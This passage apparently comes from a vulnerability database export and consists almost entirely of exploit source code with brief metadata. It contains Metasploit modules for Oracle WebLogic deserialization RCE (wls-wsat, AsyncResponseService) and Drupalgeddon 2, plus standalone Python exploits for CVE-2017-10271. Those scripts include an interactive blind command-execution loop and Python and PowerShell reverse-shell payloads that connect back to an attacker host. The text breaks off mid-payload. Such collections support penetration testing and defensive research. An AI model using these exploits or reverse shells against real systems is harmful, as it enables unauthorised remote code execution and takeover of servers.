It's generally easiest\n # just to put the default at the beginning of the list and skip this\n # entirely.\n 'DefaultTarget' => 0\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'The base path to the WebLogic WSAT endpoint', '/wls-wsat/CoordinatorPortType']),\n OptPort.new('RPORT', [true, \"The remote port that the WebLogic WSAT endpoint listens on\", 7001]),\n OptFloat.new('TIMEOUT', [true, \"The timeout value of requests to RHOST\", 20.0]),\n # OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the check payload', 10])\n ])\n end\n\n def cmd_base\n if target['Platform'] == 'win'\n return 'cmd'\n else\n return '/bin/sh'\n end\n end\n\n def cmd_opt\n if target['Platform'] == 'win'\n return '/c'\n else\n return '-c'\n end\n end\n\n\n #\n # This generates a XML payload that will execute the desired payload on the RHOST\n #\n def exploit_process_builder_payload\n # Generate a payload which will execute on a *nix machine using /bin/sh\n xml = %Q{<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header>\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n <java>\n <void class=\"java.lang.ProcessBuilder\">\n <array class=\"java.lang.String\" length=\"3\" >\n <void index=\"0\">\n <string>#{cmd_base}</string>\n </void>\n <void index=\"1\">\n <string>#{cmd_opt}</string>\n </void>\n <void index=\"2\">\n <string>#{payload.encoded.encode(xml: :text)}</string>\n </void>\n </array>\n <void method=\"start\"/>\n </void>\n </java>\n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body/>\n</soapenv:Envelope>}\n end\n\n #\n # This builds a XML payload that will generate a HTTP GET request to our SRVHOST\n # from the target machine.\n #\n def check_process_builder_payload\n xml = %Q{<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header>\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n <java version=\"1.8\" 
class=\"java.beans.XMLDecoder\">\n <void id=\"url\" class=\"java.net.URL\">\n <string>#{get_uri.encode(xml: :text)}</string>\n </void>\n <void idref=\"url\">\n <void id=\"stream\" method = \"openStream\" />\n </void>\n </java>\n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body/>\n</soapenv:Envelope>}\n end\n\n #\n # In the event that a 'check' host responds, we should respond randomly so that we don't clog up\n # the logs too much with a no response error or similar.\n #\n def on_request_uri(cli, request)\n random_content = '<html><head></head><body><p>'+Rex::Text.rand_text_alphanumeric(20)+'<p></body></html>'\n send_response(cli, random_content)\n\n @received_request = true\n end\n\n #\n # The exploit method connects to the remote service and sends a randomly generated string\n # encapsulated within a SOAP XML body. This will start an HTTP server for us to receive\n # the response from. This is based off of the exploit technique from\n # exploits/windows/novell/netiq_pum_eval.rb\n #\n # This doesn't work as is because MSF cannot mix HttpServer and HttpClient\n # at the time of authoring this\n #\n # def check\n # start_service\n #\n # print_status('Sending the check payload...')\n # res = send_request_cgi({\n # 'method' => 'POST',\n # 'uri' => normalize_uri(target_uri.path),\n # 'data' => check_process_builder_payload,\n # 'ctype' => 'text/xml;charset=UTF-8'\n # }, datastore['TIMEOUT'])\n #\n # print_status(\"Waiting #{datastore['HTTP_DELAY']} seconds to see if the target requests our URI...\")\n #\n # waited = 0\n # until @received_request\n # sleep 1\n # waited += 1\n # if waited > datastore['HTTP_DELAY']\n # cleanup_service\n # return Exploit::CheckCode::Safe\n # end\n # end\n #\n # cleanup_service\n # return Exploit::CheckCode::Vulnerable\n # end\n\n #\n # The exploit method connects to the remote service and sends the specified payload\n # encapsulated within a SOAP XML body.\n #\n def exploit\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => 
normalize_uri(target_uri.path),\n 'data' => exploit_process_builder_payload,\n 'ctype' => 'text/xml;charset=UTF-8'\n }, datastore['TIMEOUT'])\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-06-24T09:19:13", "description": "This module exploits a Drupal property injection in the Forms API. Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are vulnerable.\n", "cvss3": {}, "published": "2018-04-14T05:22:30", "type": "metasploit", "title": "Drupal Drupalgeddon 2 Forms API Property Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2021-02-25T16:47:49", "id": "MSF:EXPLOIT-UNIX-WEBAPP-DRUPAL_DRUPALGEDDON2-", "href": "https://www.rapid7.com/db/modules/exploit/unix/webapp/drupal_drupalgeddon2/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HTTP::Drupal\n # XXX: CmdStager can't handle badchars\n include Msf::Exploit::PhpEXE\n include Msf::Exploit::FileDropper\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Drupal Drupalgeddon 2 Forms API Property Injection',\n 'Description' => %q{\n This module exploits a Drupal property injection in the Forms API.\n\n Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are vulnerable.\n },\n 'Author' => [\n 'Jasper Mattsson', # Vulnerability discovery\n 'a2u', # Proof of concept (Drupal 8.x)\n 'Nixawk', # Proof of concept (Drupal 8.x)\n 'FireFart', # Proof of concept (Drupal 7.x)\n 'wvu' # Metasploit module\n ],\n 'References' => [\n ['CVE', '2018-7600'],\n ['URL', 'https://www.drupal.org/sa-core-2018-002'],\n ['URL', 
'https://greysec.net/showthread.php?tid=2912'],\n ['URL', 'https://research.checkpoint.com/uncovering-drupalgeddon-2/'],\n ['URL', 'https://github.com/a2u/CVE-2018-7600'],\n ['URL', 'https://github.com/nixawk/labs/issues/19'],\n ['URL', 'https://github.com/FireFart/CVE-2018-7600']\n ],\n 'DisclosureDate' => '2018-03-28',\n 'License' => MSF_LICENSE,\n 'Platform' => ['php', 'unix', 'linux'],\n 'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Payload' => {'BadChars' => '&>\\''},\n 'Targets' => [\n #\n # Automatic targets (PHP, cmd/unix, native)\n #\n ['Automatic (PHP In-Memory)',\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Type' => :php_memory\n ],\n ['Automatic (PHP Dropper)',\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Type' => :php_dropper\n ],\n ['Automatic (Unix In-Memory)',\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_memory\n ],\n ['Automatic (Linux Dropper)',\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper\n ],\n #\n # Drupal 7.x targets (PHP, cmd/unix, native)\n #\n ['Drupal 7.x (PHP In-Memory)',\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Version' => Rex::Version.new('7'),\n 'Type' => :php_memory\n ],\n ['Drupal 7.x (PHP Dropper)',\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Version' => Rex::Version.new('7'),\n 'Type' => :php_dropper\n ],\n ['Drupal 7.x (Unix In-Memory)',\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Version' => Rex::Version.new('7'),\n 'Type' => :unix_memory\n ],\n ['Drupal 7.x (Linux Dropper)',\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Version' => Rex::Version.new('7'),\n 'Type' => :linux_dropper\n ],\n #\n # Drupal 8.x targets (PHP, cmd/unix, native)\n #\n ['Drupal 8.x (PHP In-Memory)',\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Version' => Rex::Version.new('8'),\n 'Type' => :php_memory\n ],\n ['Drupal 8.x (PHP Dropper)',\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Version' => Rex::Version.new('8'),\n 
'Type' => :php_dropper\n ],\n ['Drupal 8.x (Unix In-Memory)',\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Version' => Rex::Version.new('8'),\n 'Type' => :unix_memory\n ],\n ['Drupal 8.x (Linux Dropper)',\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Version' => Rex::Version.new('8'),\n 'Type' => :linux_dropper\n ]\n ],\n 'DefaultTarget' => 0, # Automatic (PHP In-Memory)\n 'DefaultOptions' => {'WfsDelay' => 2}, # Also seconds between attempts\n 'Notes' => {'AKA' => ['SA-CORE-2018-002', 'Drupalgeddon 2']}\n ))\n\n register_options([\n OptString.new('PHP_FUNC', [true, 'PHP function to execute', 'passthru']),\n OptBool.new('DUMP_OUTPUT', [false, 'Dump payload command output', false])\n ])\n\n register_advanced_options([\n OptString.new('WritableDir', [true, 'Writable dir for droppers', '/tmp'])\n ])\n end\n\n def check\n checkcode = CheckCode::Unknown\n\n @version = target['Version'] || drupal_version\n\n unless @version\n vprint_error('Could not determine Drupal version to target')\n return checkcode\n end\n\n vprint_status(\"Drupal #{@version} targeted at #{full_uri}\")\n checkcode = CheckCode::Detected\n\n changelog = drupal_changelog(@version)\n\n unless changelog\n vprint_error('Could not determine Drupal patch level')\n return checkcode\n end\n\n case drupal_patch(changelog, 'SA-CORE-2018-002')\n when nil\n vprint_warning('CHANGELOG.txt no longer contains patch level')\n when true\n vprint_warning('Drupal appears patched in CHANGELOG.txt')\n checkcode = CheckCode::Safe\n when false\n vprint_good('Drupal appears unpatched in CHANGELOG.txt')\n checkcode = CheckCode::Appears\n end\n\n # NOTE: Exploiting the vuln will move us from \"Safe\" to Vulnerable\n token = rand_str\n res = execute_command(token, func: 'printf')\n\n return checkcode unless res\n\n if res.body.start_with?(token)\n vprint_good('Drupal is vulnerable to code execution')\n checkcode = CheckCode::Vulnerable\n end\n\n checkcode\n end\n\n def exploit\n unless @version\n 
print_warning('Targeting Drupal 7.x as a fallback')\n @version = Rex::Version.new('7')\n end\n\n if datastore['PAYLOAD'] == 'cmd/unix/generic'\n print_warning('Enabling DUMP_OUTPUT for cmd/unix/generic')\n # XXX: Naughty datastore modification\n datastore['DUMP_OUTPUT'] = true\n end\n\n # NOTE: assert() is attempted first, then PHP_FUNC if that fails\n case target['Type']\n when :php_memory\n execute_command(payload.encoded, func: 'assert')\n\n sleep(wfs_delay)\n return if session_created?\n\n # XXX: This will spawn a *very* obvious process\n execute_command(\"php -r '#{payload.encoded}'\")\n when :unix_memory\n execute_command(payload.encoded)\n when :php_dropper, :linux_dropper\n dropper_assert\n\n sleep(wfs_delay)\n return if session_created?\n\n dropper_exec\n end\n end\n\n def dropper_assert\n php_file = Pathname.new(\n \"#{datastore['WritableDir']}/#{rand_str}.php\"\n ).cleanpath\n\n # Return the PHP payload or a PHP binary dropper\n dropper = get_write_exec_payload(\n writable_path: datastore['WritableDir'],\n unlink_self: true # Worth a shot\n )\n\n # Encode away potential badchars with Base64\n dropper = Rex::Text.encode_base64(dropper)\n\n # Stage 1 decodes the PHP and writes it to disk\n stage1 = %Q{\n file_put_contents(\"#{php_file}\", base64_decode(\"#{dropper}\"));\n }\n\n # Stage 2 executes said PHP in-process\n stage2 = %Q{\n include_once(\"#{php_file}\");\n }\n\n # :unlink_self may not work, so let's make sure\n register_file_for_cleanup(php_file)\n\n # Hopefully pop our shell with assert()\n execute_command(stage1.strip, func: 'assert')\n execute_command(stage2.strip, func: 'assert')\n end\n\n def dropper_exec\n php_file = \"#{rand_str}.php\"\n tmp_file = Pathname.new(\n \"#{datastore['WritableDir']}/#{php_file}\"\n ).cleanpath\n\n # Return the PHP payload or a PHP binary dropper\n dropper = get_write_exec_payload(\n writable_path: datastore['WritableDir'],\n unlink_self: true # Worth a shot\n )\n\n # Encode away potential badchars with Base64\n 
dropper = Rex::Text.encode_base64(dropper)\n\n # :unlink_self may not work, so let's make sure\n register_file_for_cleanup(php_file)\n\n # Write the payload or dropper to disk (!)\n # NOTE: Analysis indicates > is a badchar for 8.x\n execute_command(\"echo #{dropper} | base64 -d | tee #{php_file}\")\n\n # Attempt in-process execution of our PHP script\n send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, php_file)\n )\n\n sleep(wfs_delay)\n return if session_created?\n\n # Try to get a shell with PHP CLI\n execute_command(\"php #{php_file}\")\n\n sleep(wfs_delay)\n return if session_created?\n\n register_file_for_cleanup(tmp_file)\n\n # Fall back on our temp file\n execute_command(\"echo #{dropper} | base64 -d | tee #{tmp_file}\")\n execute_command(\"php #{tmp_file}\")\n end\n\n def execute_command(cmd, opts = {})\n func = opts[:func] || datastore['PHP_FUNC'] || 'passthru'\n\n vprint_status(\"Executing with #{func}(): #{cmd}\")\n\n res =\n case @version.to_s\n when /^7\\b/\n exploit_drupal7(func, cmd)\n when /^8\\b/\n exploit_drupal8(func, cmd)\n end\n\n return unless res\n\n if res.code == 200\n print_line(res.body) if datastore['DUMP_OUTPUT']\n else\n print_error(\"Unexpected reply: #{res.inspect}\")\n end\n\n res\n end\n\n def exploit_drupal7(func, code)\n vars_get = {\n 'q' => 'user/password',\n 'name[#post_render][]' => func,\n 'name[#markup]' => code,\n 'name[#type]' => 'markup'\n }\n\n vars_post = {\n 'form_id' => 'user_pass',\n '_triggering_element_name' => 'name'\n }\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path),\n 'vars_get' => vars_get,\n 'vars_post' => vars_post\n )\n\n return res unless res && res.code == 200\n\n form_build_id = res.get_html_document.at(\n '//input[@name = \"form_build_id\"]/@value'\n )\n\n return res unless form_build_id\n\n vars_get = {\n 'q' => \"file/ajax/name/#value/#{form_build_id.value}\"\n }\n\n vars_post = {\n 'form_build_id' => form_build_id.value\n 
}\n\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path),\n 'vars_get' => vars_get,\n 'vars_post' => vars_post\n )\n end\n\n def exploit_drupal8(func, code)\n # Clean URLs are enabled by default and \"can't\" be disabled\n uri = normalize_uri(target_uri.path, 'user/register')\n\n vars_get = {\n 'element_parents' => 'account/mail/#value',\n 'ajax_form' => 1,\n '_wrapper_format' => 'drupal_ajax'\n }\n\n vars_post = {\n 'form_id' => 'user_register_form',\n '_drupal_ajax' => 1,\n 'mail[#type]' => 'markup',\n 'mail[#post_render][]' => func,\n 'mail[#markup]' => code\n }\n\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => uri,\n 'vars_get' => vars_get,\n 'vars_post' => vars_post\n )\n end\n\n def rand_str\n Rex::Text.rand_text_alphanumeric(8..42)\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/drupal_drupalgeddon2.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-07-08T00:44:32", "description": "An unauthenticated attacker with network access to the Oracle Weblogic Server T3 interface can send a malicious SOAP request to the interface WLS AsyncResponseService to execute code on the vulnerable host.\n", "cvss3": {}, "published": "2019-04-26T01:03:17", "type": "metasploit", "title": "Oracle Weblogic Server Deserialization RCE - AsyncResponseService", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-2725"], "modified": "2022-07-07T23:05:56", "id": "MSF:EXPLOIT-MULTI-MISC-WEBLOGIC_DESERIALIZE_ASYNCRESPONSESERVICE-", "href": "https://www.rapid7.com/db/modules/exploit/multi/misc/weblogic_deserialize_asyncresponseservice/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Powershell\n\n def 
initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Oracle Weblogic Server Deserialization RCE - AsyncResponseService ',\n 'Description' => %q{\n An unauthenticated attacker with network access to the Oracle Weblogic Server T3\n interface can send a malicious SOAP request to the interface WLS AsyncResponseService\n to execute code on the vulnerable host.\n },\n 'Author' => [\n 'Andres Rodriguez - 2Secure (@acamro) <acamro[at]gmail.com>', # Metasploit Module\n ],\n 'License' => MSF_LICENSE,\n 'References' => [\n ['CVE', '2019-2725'],\n ['CNVD-C', '2019-48814'],\n ['URL', 'http://www.cnvd.org.cn/webinfo/show/4999'],\n ['URL', 'https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html'],\n ['URL', 'https://twitter.com/F5Labs/status/1120822404568244224']\n ],\n 'Privileged' => false,\n 'Platform' => %w[unix win solaris],\n 'Targets' => [\n [\n 'Unix',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }\n }\n ],\n [\n 'Windows',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' }\n }\n ],\n [\n 'Solaris',\n {\n 'Platform' => 'solaris',\n 'Arch' => ARCH_CMD,\n 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl' },\n 'Payload' => {\n 'Space' => 2048,\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'generic perl telnet'\n }\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'WfsDelay' => 12\n },\n 'DisclosureDate' => '2019-04-23',\n 'Notes' => {\n 'Stability' => [ CRASH_SAFE ],\n 'SideEffects' => [ IOC_IN_LOGS ],\n 'Reliability' => [ REPEATABLE_SESSION ]\n }\n )\n )\n\n register_options(\n [\n Opt::RPORT(7001),\n OptString.new('TARGETURI', [true, 'URL to AsyncResponseService', '/_async/AsyncResponseService'])\n ]\n )\n end\n\n def check\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path),\n 'method' => 'POST',\n 
'ctype' => 'text/xml',\n 'headers' => { 'SOAPAction' => '' }\n )\n\n if res && res.code == 500 && res.body.include?('<faultcode>env:Client</faultcode>')\n vprint_status(\"The target returned a vulnerable HTTP code: /#{res.code}\")\n vprint_status(\"The target returned a vulnerable HTTP error: /#{res.body.split(\"\\n\")[0]}\")\n Exploit::CheckCode::Vulnerable\n elsif res && res.code != 202\n vprint_status('The target returned a non-vulnerable HTTP code')\n Exploit::CheckCode::Safe\n elsif res.nil?\n vprint_status('The target did not respond in an expected way')\n Exploit::CheckCode::Unknown\n else\n vprint_status(\"The target returned HTTP code: #{res.code}\")\n vprint_status(\"The target returned HTTP body: #{res.body.split(\"\\n\")[0]} [...]\")\n Exploit::CheckCode::Unknown\n end\n end\n\n def exploit\n print_status('Generating payload...')\n case target.name\n when 'Windows'\n string0_cmd = 'cmd.exe'\n string1_param = '/c'\n shell_payload = cmd_psh_payload(payload.encoded, payload_instance.arch.first, { remove_comspec: true, encoded: false })\n when 'Unix', 'Solaris'\n string0_cmd = '/bin/bash'\n string1_param = '-c'\n shell_payload = payload.encoded\n end\n\n random_action = rand_text_alphanumeric(20)\n random_relates = rand_text_alphanumeric(20)\n\n soap_payload = %(<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\")\n soap_payload << %(xmlns:wsa=\"http://www.w3.org/2005/08/addressing\")\n soap_payload << %(xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\">)\n soap_payload << %(<soapenv:Header>)\n soap_payload << %(<wsa:Action>#{random_action}</wsa:Action>)\n soap_payload << %(<wsa:RelatesTo>#{random_relates}</wsa:RelatesTo>)\n soap_payload << %(<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">)\n soap_payload << %(<void class=\"java.lang.ProcessBuilder\">)\n soap_payload << %(<array class=\"java.lang.String\" length=\"3\">)\n soap_payload << %(<void index=\"0\">)\n soap_payload << 
%(<string>#{string0_cmd}</string>)\n soap_payload << %(</void>)\n soap_payload << %(<void index=\"1\">)\n soap_payload << %(<string>#{string1_param}</string>)\n soap_payload << %(</void>)\n soap_payload << %(<void index=\"2\">)\n soap_payload << %(<string>#{shell_payload.encode(xml: :text)}</string>)\n # soap_payload << %Q|<string>#{xml_encode(shell_payload)}</string>|\n soap_payload << %(</void>)\n soap_payload << %(</array>)\n soap_payload << %(<void method=\"start\"/>)\n soap_payload << %(</void>)\n soap_payload << %(</work:WorkContext>)\n soap_payload << %(</soapenv:Header>)\n soap_payload << %(<soapenv:Body>)\n soap_payload << %(<asy:onAsyncDelivery/>)\n soap_payload << %(</soapenv:Body>)\n soap_payload << %(</soapenv:Envelope>)\n\n print_status('Sending payload...')\n\n begin\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path),\n 'method' => 'POST',\n 'ctype' => 'text/xml',\n 'data' => soap_payload,\n 'headers' => { 'SOAPAction' => '' }\n )\n rescue Errno::ENOTCONN\n fail_with(Failure::Disconnected, 'The target forcibly closed the connection, and is likely not vulnerable.')\n end\n\n if res.nil?\n fail_with(Failure::Unreachable, 'No response from host')\n elsif res && res.code != 202\n fail_with(Failure::UnexpectedReply, \"Exploit failed. 
Host responded with HTTP code #{res.code} instead of HTTP code 202\")\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:39", "description": "\nOracle WebLogic Server 10.3.6.0.0 12.x - Remote Command Execution", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-12-26T00:00:00", "title": "Oracle WebLogic Server 10.3.6.0.0 12.x - Remote Command Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2017-12-26T00:00:00", "id": "EXPLOITPACK:C22F157FABAD412B7D508C7EEC750856", "href": "", "sourceData": "import requests\nimport sys\n\nurl_in = sys.argv[1]\npayload_url = url_in + \"/wls-wsat/CoordinatorPortType\"\npayload_header = {'content-type': 'text/xml'}\n\n\ndef payload_command (command_in):\n html_escape_table = {\n \"&\": \"&\",\n '\"': \"\"\",\n \"'\": \"'\",\n \">\": \">\",\n \"<\": \"<\",\n }\n command_filtered = 
\"<string>\"+\"\".join(html_escape_table.get(c, c) for c in command_in)+\"</string>\"\n payload_1 = \"<soapenv:Envelope xmlns:soapenv=\\\"http://schemas.xmlsoap.org/soap/envelope/\\\"> \\n\" \\\n \" <soapenv:Header> \" \\\n \" <work:WorkContext xmlns:work=\\\"http://bea.com/2004/06/soap/workarea/\\\"> \\n\" \\\n \" <java version=\\\"1.8.0_151\\\" class=\\\"java.beans.XMLDecoder\\\"> \\n\" \\\n \" <void class=\\\"java.lang.ProcessBuilder\\\"> \\n\" \\\n \" <array class=\\\"java.lang.String\\\" length=\\\"3\\\">\" \\\n \" <void index = \\\"0\\\"> \" \\\n \" <string>cmd</string> \" \\\n \" </void> \" \\\n \" <void index = \\\"1\\\"> \" \\\n \" <string>/c</string> \" \\\n \" </void> \" \\\n \" <void index = \\\"2\\\"> \" \\\n + command_filtered + \\\n \" </void> \" \\\n \" </array>\" \\\n \" <void method=\\\"start\\\"/>\" \\\n \" </void>\" \\\n \" </java>\" \\\n \" </work:WorkContext>\" \\\n \" </soapenv:Header>\" \\\n \" <soapenv:Body/>\" \\\n \"</soapenv:Envelope>\"\n return payload_1\n\ndef do_post(command_in):\n result = requests.post(payload_url, payload_command(command_in ),headers = payload_header)\n\n if result.status_code == 500:\n print \"Command Executed \\n\"\n else:\n print \"Something Went Wrong \\n\"\n\n\n\nprint \"***************************************************** \\n\" \\\n \"**************** Coded By 1337g ****************** \\n\" \\\n \"* CVE-2017-10271 Blind Remote Command Execute EXP * \\n\" \\\n \"***************************************************** \\n\"\n\nwhile 1:\n command_in = raw_input(\"Eneter your command here: \")\n if command_in == \"exit\" : exit(0)\n do_post(command_in)", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-04-01T19:04:39", "description": "\nOracle WebLogic 10.3.6 - wls-wsat Component Deserialisation Remote Command Execution", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": 
"UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-01-03T00:00:00", "title": "Oracle WebLogic 10.3.6 - wls-wsat Component Deserialisation Remote Command Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2018-01-03T00:00:00", "id": "EXPLOITPACK:E47A4ABCB334901131160C872A570166", "href": "", "sourceData": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Exploit Title: Weblogic wls-wsat Component Deserialization RCE\n# Date Authored: Jan 3, 2018\n# Date Announced: 10/19/2017\n# Exploit Author: Kevin Kirsche (d3c3pt10n)\n# Exploit Github: https://github.com/kkirsche/CVE-2017-10271\n# Exploit is based off of POC by Luffin from Github\n# https://github.com/Luffin/CVE-2017-10271\n# Vendor Homepage: http://www.oracle.com/technetwork/middleware/weblogic/overview/index.html\n# Version: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0\n# Tested on: Oracle WebLogic 10.3.6.0.0 running on Oracle Linux 6.8 and Ubuntu 14.04.4 LTS\n# CVE: CVE-2017-10271\n# Usage: python exploit.py -l 10.10.10.10 -p 4444 -r http://will.bepwned.com:7001/\n# (Python 3) Example check listener: python3 -m http.server 4444\n# (Python 2) Example check listener: python -m SimpleHTTPServer 4444\n# (Netcat) Example exploit listener: nc -nlvp 
4444\n\nfrom sys import exit\nfrom requests import post\nfrom argparse import ArgumentParser\nfrom random import choice\nfrom string import ascii_uppercase, ascii_lowercase, digits\nfrom xml.sax.saxutils import escape\n\nclass Exploit:\n\n def __init__(self, check, rhost, lhost, lport, windows):\n self.url = rhost if not rhost.endswith('/') else rhost.strip('/')\n self.lhost = lhost\n self.lport = lport\n self.check = check\n if windows:\n self.target = 'win'\n else:\n self.target = 'unix'\n\n if self.target == 'unix':\n # Unix reverse shell\n # You should also be able to instead use something from MSFVenom. E.g.\n # msfvenom -p cmd/unix/reverse_python LHOST=10.10.10.10 LPORT=4444\n self.cmd_payload = (\n \"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.\"\n \"SOCK_STREAM);s.connect((\\\"{lhost}\\\",{lport}));os.dup2(s.fileno(),0); os.dup2(\"\n \"s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"]);'\"\n ).format(lhost=self.lhost, lport=self.lport)\n else:\n # Windows reverse shell\n # Based on msfvenom -p cmd/windows/reverse_powershell LHOST=10.10.10.10 LPORT=4444\n self.cmd_payload = (\n r\"powershell -w hidden -nop -c function RSC{if ($c.Connected -eq $true) \"\n r\"{$c.Close()};if ($p.ExitCode -ne $null) {$p.Close()};exit;};$a='\" + self.lhost +\"\"\n r\"';$p='\"+ self.lport + \"';$c=New-Object system.net.sockets.tcpclient;$c.connect($a\"\n r\",$p);$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize;\"\n r\"$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';\"\n r\"$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;\"\n r\"$p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput;\"\n r\"$os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding;\"\n r\"while($os.Peek() -ne -1){$o += $e.GetString($os.Read())};\"\n r\"$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;$d=$false;$t=0;\"\n 